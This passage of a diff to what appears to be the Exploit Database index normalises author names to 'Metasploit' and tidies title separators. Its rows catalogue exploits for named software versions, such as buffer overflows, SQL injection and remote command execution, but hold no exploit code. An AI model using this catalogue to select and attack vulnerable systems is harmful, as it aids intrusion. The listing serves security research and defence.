Creation",2012-09-05,metasploit,php,webapps,0 -21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0 +21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation",2012-09-05,Metasploit,php,webapps,0 +21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,Metasploit,multiple,remote,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 -21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0 +21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,Metasploit,windows,local,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 @@ -18414,7 +18414,7 @@ id,file,description,date,author,platform,type,port 21123,platforms/windows/dos/21123.txt,"Microsoft Windows 2000/NT Terminal Server Service RDP DoS",2001-10-18,"Luciano Martins",windows,dos,0 21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Local Root",2001-10-18,"Rafal Wojtczuk",linux,local,0 21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote,0 -21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 +21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote,0 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0 21129,platforms/cgi/remote/21129.java,"iBill Management Script Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0 @@ -18424,10 +18424,10 @@ id,file,description,date,author,platform,type,port 21133,platforms/php/webapps/21133.txt,"Clipster Video Persistent XSS",2012-09-07,DaOne,php,webapps,0 21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - CSRF",2012-09-07,"High-Tech Bridge SA",php,webapps,0 -21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 SSH Default Password Security Bypass",2012-08-30,metasploit,linux,remote,0 -21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,metasploit,multiple,remote,0 -21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload",2012-09-08,metasploit,php,remote,0 -21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",2012-09-08,metasploit,windows,local,0 +21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 SSH Default Password Security Bypass",2012-08-30,Metasploit,linux,remote,0 +21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,Metasploit,multiple,remote,0 +21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload",2012-09-08,Metasploit,php,remote,0 +21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",2012-09-08,Metasploit,windows,local,0 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 21148,platforms/php/webapps/21148.txt,"Pinterest Clone Script - Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps,0 21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0 @@ -18475,8 +18475,8 @@ id,file,description,date,author,platform,type,port 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote,0 -21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,metasploit,linux,remote,0 -21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,metasploit,linux,remote,0 +21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,Metasploit,linux,remote,0 +21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,Metasploit,linux,remote,0 21192,platforms/linux/remote/21192.c,"STunnel 3.x Client Negotiation Protocol Format String",2001-12-22,deltha,linux,remote,0 21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting",2001-12-28,"SNS Research",multiple,remote,0 21194,platforms/cgi/remote/21194.txt,"Abe Timmerman zml.cgi File Disclosure",2001-12-31,blackshell,cgi,remote,0 @@ -18657,7 +18657,7 @@ id,file,description,date,author,platform,type,port 21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote,0 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x User-Embedded Scripting",2002-04-13,ppp-design,php,webapps,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 -21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 +21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 @@ -19011,7 +19011,7 @@ id,file,description,date,author,platform,type,port 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 -21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 +21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 @@ -19058,7 +19058,7 @@ id,file,description,date,author,platform,type,port 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0 -21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 - (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Local Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 @@ -19107,24 +19107,24 @@ id,file,description,date,author,platform,type,port 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 -21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,metasploit,php,webapps,0 -21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload",2012-10-10,metasploit,linux,webapps,0 -21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322 -21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,metasploit,windows,remote,3217 -21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,metasploit,windows,remote,0 -21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,metasploit,windows,remote,0 -21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,metasploit,windows,remote,0 -21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0 -21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,metasploit,windows,local,0 -21844,platforms/windows/local/21844.rb,"Microsoft Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,metasploit,windows,local,0 -21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,metasploit,windows,local,0 -21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,metasploit,java,remote,7001 -21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,metasploit,windows,remote,0 -21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,metasploit,linux,local,0 -21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog Command Execution",2012-10-10,metasploit,unix,remote,444 -21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,metasploit,linux,remote,0 -21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000 -21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution",2012-10-10,metasploit,unix,remote,0 +21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 +21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 +21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 +21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 +21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 +21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 +21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,Metasploit,windows,remote,0 +21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 +21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 +21844,platforms/windows/local/21844.rb,"Microsoft Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 +21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 +21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,Metasploit,java,remote,7001 +21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,Metasploit,windows,remote,0 +21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,Metasploit,linux,local,0 +21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog Command Execution",2012-10-10,Metasploit,unix,remote,444 +21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,Metasploit,linux,remote,0 +21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,Metasploit,unix,remote,10000 +21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution",2012-10-10,Metasploit,unix,remote,0 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 21855,platforms/php/webapps/21855.txt,"PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting",2002-09-24,"Mark Grimes",php,webapps,0 @@ -19140,8 +19140,8 @@ id,file,description,date,author,platform,type,port 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0 -21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0 +21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 +21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure",2002-09-26,"Rossen Raykov",linux,remote,0 21871,platforms/linux/local/21871.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local,0 21872,platforms/linux/local/21872.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local,0 @@ -19154,7 +19154,7 @@ id,file,description,date,author,platform,type,port 21879,platforms/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal",2002-09-30,"ET LoWNOISE",java,webapps,0 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 -21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution",2012-10-11,metasploit,windows,remote,0 +21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution",2012-10-11,Metasploit,windows,remote,0 21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 - (.png) ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 @@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 -21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload",2012-10-16,metasploit,php,webapps,0 +21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload",2012-10-16,Metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 Add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 @@ -19255,8 +19255,8 @@ id,file,description,date,author,platform,type,port 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 m2p quartz.dll Heap Pointer Overwrite PoC",2012-10-15,"James Ritchey",windows,dos,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 -21993,platforms/php/remote/21993.rb,"AjaXplorer checkInstall.php Remote Command Execution",2012-10-16,metasploit,php,remote,0 -21994,platforms/windows/local/21994.rb,"Windows Escalate Service Permissions Local Privilege Escalation",2012-10-16,metasploit,windows,local,0 +21993,platforms/php/remote/21993.rb,"AjaXplorer checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 +21994,platforms/windows/local/21994.rb,"Windows Escalate Service Permissions Local Privilege Escalation",2012-10-16,Metasploit,windows,local,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 Non-existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 @@ -19354,7 +19354,7 @@ id,file,description,date,author,platform,type,port 22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal",2012-10-19,xistence,multiple,webapps,0 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM SQLi (Metasploit)",2012-10-19,xistence,windows,remote,0 -22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 @@ -19414,11 +19414,11 @@ id,file,description,date,author,platform,type,port 22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component (index.php search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - CSRF & Persistent XSS",2012-10-22,pcsjj,php,webapps,0 -22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 +22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 -22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,metasploit,windows,remote,21 +22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,Metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 @@ -19438,7 +19438,7 @@ id,file,description,date,author,platform,type,port 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946 b Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 -22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 +22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 @@ -19464,7 +19464,7 @@ id,file,description,date,author,platform,type,port 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include",2003-01-30,Havenard,php,webapps,0 -22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 Malformed HTTP Request DoS",2003-01-30,"Nathan Neulinger",multiple,dos,0 +22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request DoS",2003-01-30,"Nathan Neulinger",multiple,dos,0 22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Include",2003-02-03,frog,php,webapps,0 22209,platforms/php/webapps/22209.txt,"phpMyShop 1.0 compte.php SQL Injection",2003-02-03,frog,php,webapps,0 22210,platforms/openbsd/local/22210.txt,"OpenBSD 2.x/3.x CHPass Temporary File Link File Content Revealing",2003-02-03,"Marc Bevand",openbsd,local,0 @@ -19557,9 +19557,9 @@ id,file,description,date,author,platform,type,port 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF",2012-10-28,b33f,windows,remote,0 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 -22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",2012-10-28,metasploit,multiple,remote,0 -22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",2012-10-29,metasploit,windows,remote,0 -22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,metasploit,windows,remote,0 +22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",2012-10-28,Metasploit,multiple,remote,0 +22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 +22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 22330,platforms/windows/dos/22330.txt,"Microsoft Office Excel 2010 - Crash PoC",2012-10-29,coolkaveh,windows,dos,0 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0 @@ -19582,7 +19582,7 @@ id,file,description,date,author,platform,type,port 22324,platforms/unix/local/22324.c,"File 3.x - Local Stack Overflow Code Execution (1)",2003-03-04,lem0n,unix,local,0 22325,platforms/unix/local/22325.c,"File 3.x - Local Stack Overflow Code Execution (2)",2003-03-04,lem0nxx,unix,local,0 22326,platforms/linux/local/22326.c,"File 3.x Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0 -22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing",2003-03-05,bit_logic,multiple,remote,0 +22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,multiple,remote,0 22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow",2003-03-05,"Fernandez Madrid",windows,dos,0 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud 